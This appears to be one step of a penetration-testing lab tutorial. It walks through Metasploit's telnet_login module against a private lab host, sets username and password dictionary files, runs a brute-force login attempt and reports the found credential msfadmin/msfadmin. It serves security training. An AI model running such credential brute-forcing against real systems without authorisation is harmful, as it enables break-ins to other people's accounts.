In this step, we will configure the Metasploit module with the target host, username dictionary, and password dictionary.
First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
Use the auxiliary/scanner/telnet/telnet_login module:
use auxiliary/scanner/telnet/telnet_login
Set the target host:
set RHOSTS 192.168.122.102
Set the username dictionary file:
set USER_FILE /username.txt
Set the password dictionary file:
set PASS_FILE /password.txt
At last, run the exploit:
exploit
Metasploit will start trying different username and password combinations from the provided dictionaries. If a valid credential is found, it will be displayed in green.
In this case, the valid credential is msfadmin/msfadmin.
Press Ctrl+D to quit the Metasploit console then start the inspection